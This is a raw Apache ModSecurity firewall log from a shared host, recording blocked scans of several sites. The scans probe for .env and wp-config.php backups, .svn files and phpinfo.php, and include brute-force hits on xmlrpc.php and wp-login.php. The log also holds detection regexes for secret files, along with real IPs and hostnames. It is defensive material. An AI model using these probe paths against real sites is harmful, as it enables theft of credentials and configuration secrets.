[Tue May 26 13:37:56.938467 2026] [security2:error] [pid 536875:tid 537109] [client 195.178.110.34:35666] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVU3Or_-FTveSGlx1HgVAAAAO0"]
[Tue May 26 13:37:57.568154 2026] [security2:error] [pid 536875:tid 537113] [client 106.192.248.115:59365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU3er_-FTveSGlx1HgYQAAAPE"]
[Tue May 26 13:37:57.568371 2026] [security2:error] [pid 536875:tid 537113] [client 106.192.248.115:59365] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU3er_-FTveSGlx1HgYQAAAPE"]
[Tue May 26 13:37:57.895650 2026] [security2:error] [pid 536875:tid 537007] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU3er_-FTveSGlx1HgZAAAAIc"]
[Tue May 26 13:37:58.825006 2026] [security2:error] [pid 536875:tid 536905] [remote 45.250.255.226:44574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVU3ur_-FTveSGlx1HgfgAAoB0"]
[Tue May 26 13:37:59.359455 2026] [security2:error] [pid 536875:tid 537017] [client 195.178.110.34:35672] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVU3-r_-FTveSGlx1HgjQAAAJE"]
[Tue May 26 13:38:00.148873 2026] [security2:error] [pid 536875:tid 537046] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU3-r_-FTveSGlx1HgmAAAAK4"]
[Tue May 26 13:38:00.558373 2026] [security2:error] [pid 536875:tid 537112] [client 129.222.147.134:38915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU4Or_-FTveSGlx1HgsQAAAPA"]
[Tue May 26 13:38:00.558493 2026] [security2:error] [pid 536875:tid 537112] [client 129.222.147.134:38915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU4Or_-FTveSGlx1HgsQAAAPA"]
[Tue May 26 13:38:00.571889 2026] [security2:error] [pid 536875:tid 537118] [client 45.148.10.62:34438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env"] [unique_id "ahVU4Or_-FTveSGlx1HgtQAAAPY"]
[Tue May 26 13:38:01.269328 2026] [security2:error] [pid 536875:tid 537018] [client 45.148.10.62:51662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.bak"] [unique_id "ahVU4er_-FTveSGlx1Hg1AAAAJI"]
[Tue May 26 13:38:01.688406 2026] [security2:error] [pid 536875:tid 537094] [client 195.178.110.34:35672] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVU4er_-FTveSGlx1Hg8QAAAN4"]
[Tue May 26 13:38:02.158015 2026] [security2:error] [pid 536875:tid 537050] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU4er_-FTveSGlx1Hg9QAAALI"]
[Tue May 26 13:38:02.206086 2026] [security2:error] [pid 536875:tid 537017] [client 45.148.10.62:51662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/backend/.env"] [unique_id "ahVU4ur_-FTveSGlx1HhCAAAAJE"]
[Tue May 26 13:38:02.416509 2026] [security2:error] [pid 536875:tid 537103] [client 45.148.10.62:51662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/test.php"] [unique_id "ahVU4ur_-FTveSGlx1HhDQAAAOc"]
[Tue May 26 13:38:02.748519 2026] [security2:error] [pid 536875:tid 537031] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.backup"] [unique_id "ahVU4ur_-FTveSGlx1HhIAAAAJ8"]
[Tue May 26 13:38:03.028415 2026] [security2:error] [pid 536875:tid 537023] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.orig"] [unique_id "ahVU4-r_-FTveSGlx1HhLQAAAJc"]
[Tue May 26 13:38:03.297657 2026] [security2:error] [pid 536875:tid 537044] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.old"] [unique_id "ahVU4-r_-FTveSGlx1HhWAAAAKw"]
[Tue May 26 13:38:03.638523 2026] [security2:error] [pid 536875:tid 537031] [client 45.148.10.62:51670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/.env.php.bak"] [unique_id "ahVU4-r_-FTveSGlx1HhawAAAJ8"]
[Tue May 26 13:38:04.210161 2026] [security2:error] [pid 536875:tid 537062] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU4-r_-FTveSGlx1HhcwAAAL4"]
[Tue May 26 13:38:04.494278 2026] [security2:error] [pid 536875:tid 537084] [client 45.148.10.62:51910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/.env.php"] [unique_id "ahVU5Or_-FTveSGlx1HhiAAAANQ"]
[Tue May 26 13:38:05.798043 2026] [security2:error] [pid 536875:tid 536951] [remote 101.99.50.238:51726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVU5er_-FTveSGlx1HhsgAA9Us"]
[Tue May 26 13:38:06.152841 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU5er_-FTveSGlx1HhvAAAANQ"]
[Tue May 26 13:38:06.249331 2026] [security2:error] [pid 536875:tid 537041] [client 45.148.10.62:51914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/wp-config.php"] [unique_id "ahVU5ur_-FTveSGlx1Hh2gAAAKk"]
[Tue May 26 13:38:07.158966 2026] [security2:error] [pid 536875:tid 537068] [client 45.148.10.62:44242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujoverseas.in"] [uri "/wp-config.php.old"] [unique_id "ahVU5-r_-FTveSGlx1HiJQAAAMQ"]
[Tue May 26 13:38:07.819469 2026] [security2:error] [pid 536875:tid 537085] [client 45.148.10.62:44246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/config.php"] [unique_id "ahVU5-r_-FTveSGlx1HiMgAAANU"]
[Tue May 26 13:38:07.905801 2026] [security2:error] [pid 536875:tid 537023] [client 106.192.248.115:59665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNwAAAJc"]
[Tue May 26 13:38:07.907237 2026] [security2:error] [pid 536875:tid 537023] [client 106.192.248.115:59665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNwAAAJc"]
[Tue May 26 13:38:08.267204 2026] [security2:error] [pid 536875:tid 537051] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNAAAALM"]
[Tue May 26 13:38:08.451522 2026] [http2:info] [pid 544395:tid 544395] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:38:08.467481 2026] [security2:error] [pid 536875:tid 537036] [client 45.148.10.62:44254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/config.php.bak"] [unique_id "ahVU6Or_-FTveSGlx1HiSAAAAKQ"]
[Tue May 26 13:38:08.943753 2026] [security2:error] [pid 544395:tid 544527] [client 47.149.153.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6Bmrs7g3RMCdp8XDGwAAAAI"]
[Tue May 26 13:38:09.961225 2026] [security2:error] [pid 536875:tid 537011] [client 45.148.10.62:44256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/phpinfo.php"] [unique_id "ahVU6er_-FTveSGlx1HiXQAAAIs"]
[Tue May 26 13:38:10.167044 2026] [security2:error] [pid 544395:tid 544396] [remote 103.82.194.131:36970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.194.82.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVU6Rmrs7g3RMCdp8XDJAAADgA"]
[Tue May 26 13:38:10.487699 2026] [security2:error] [pid 536875:tid 536983] [remote 91.210.171.209:40460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVU6ur_-FTveSGlx1HifQAAiWs"]
[Tue May 26 13:38:10.584482 2026] [security2:error] [pid 544395:tid 544552] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDKwAAABs"]
[Tue May 26 13:38:10.786800 2026] [security2:error] [pid 544395:tid 544554] [client 129.222.147.134:41340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDOgAAAB0"]
[Tue May 26 13:38:10.786922 2026] [security2:error] [pid 544395:tid 544554] [client 129.222.147.134:41340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDOgAAAB0"]
[Tue May 26 13:38:11.497539 2026] [security2:error] [pid 536875:tid 537095] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU6-r_-FTveSGlx1HijQAAAN8"], referer: https://www.anujtradingco.com/
[Tue May 26 13:38:11.842635 2026] [security2:error] [pid 536875:tid 536955] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVU6-r_-FTveSGlx1HikwAAm08"]
[Tue May 26 13:38:11.842808 2026] [security2:error] [pid 536875:tid 537027] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVU6-r_-FTveSGlx1HikwAAm08"]
[Tue May 26 13:38:11.939838 2026] [security2:error] [pid 544395:tid 544591] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6xmrs7g3RMCdp8XDQwAAAEI"]
[Tue May 26 13:38:11.971230 2026] [security2:error] [pid 536875:tid 537031] [client 74.7.228.18:53434] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnaenterprises.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVU6-r_-FTveSGlx1HilQAAn2Y"]
[Tue May 26 13:38:12.111858 2026] [security2:error] [pid 544395:tid 544609] [client 74.7.175.175:56928] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVU7Bmrs7g3RMCdp8XDTgAAVHg"]
[Tue May 26 13:38:12.178469 2026] [security2:error] [pid 536875:tid 537120] [client 74.7.241.174:57386] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVU7Or_-FTveSGlx1HimAAA-F8"]
[Tue May 26 13:38:12.606868 2026] [security2:error] [pid 544395:tid 544624] [client 107.152.47.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Bmrs7g3RMCdp8XDVwAAAGM"], referer: https://www.anujtradingco.com/
[Tue May 26 13:38:12.732809 2026] [security2:error] [pid 536875:tid 537011] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Or_-FTveSGlx1HipQAAAIs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 13:38:13.139434 2026] [fcgid:warn] [pid 536875:tid 537041] (70014)End of file found: [client 199.45.155.103:3276] mod_fcgid: can't get data from http client
[Tue May 26 13:38:13.161369 2026] [security2:error] [pid 544395:tid 544650] [client 107.152.47.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Rmrs7g3RMCdp8XDZQAAAH0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1484001&moderation-hash=258bb255a626c6bac27660aa1c8f1610
[Tue May 26 13:38:14.071235 2026] [security2:error] [pid 536875:tid 537082] [client 153.75.250.147:49156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "earthone.me"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVU7er_-FTveSGlx1HizAAAANI"]
[Tue May 26 13:38:14.810397 2026] [security2:error] [pid 544395:tid 544584] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU7hmrs7g3RMCdp8XDfQAAADs"]
[Tue May 26 13:38:15.873467 2026] [security2:error] [pid 536875:tid 537034] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7-r_-FTveSGlx1Hi8gAAAKI"], referer: https://anujtradingco.com
[Tue May 26 13:38:16.037585 2026] [security2:error] [pid 544395:tid 544642] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU7xmrs7g3RMCdp8XDnwAAAHU"]
[Tue May 26 13:38:16.424603 2026] [security2:error] [pid 536875:tid 537039] [client 65.21.124.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVU7-r_-FTveSGlx1Hi6wAAAKc"]
[Tue May 26 13:38:16.688829 2026] [fcgid:warn] [pid 536875:tid 537101] (70014)End of file found: [client 66.132.195.121:24332] mod_fcgid: can't get data from http client
[Tue May 26 13:38:18.388047 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:59973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU8ur_-FTveSGlx1HjLQAAAL4"]
[Tue May 26 13:38:18.392217 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:59973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU8ur_-FTveSGlx1HjLQAAAL4"]
[Tue May 26 13:38:18.629009 2026] [security2:error] [pid 544395:tid 544627] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU8hmrs7g3RMCdp8XD9wAAAGY"]
[Tue May 26 13:38:19.822474 2026] [security2:error] [pid 536875:tid 537130] [client 66.132.195.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVU8-r_-FTveSGlx1HjPgAAAQI"]
[Tue May 26 13:38:20.578114 2026] [security2:error] [pid 536875:tid 537022] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU9Or_-FTveSGlx1HjVwAAAJY"]
[Tue May 26 13:38:21.151315 2026] [security2:error] [pid 536875:tid 537072] [client 129.222.147.134:47693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU9er_-FTveSGlx1HjdwAAAMg"]
[Tue May 26 13:38:21.151465 2026] [security2:error] [pid 536875:tid 537072] [client 129.222.147.134:47693] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU9er_-FTveSGlx1HjdwAAAMg"]
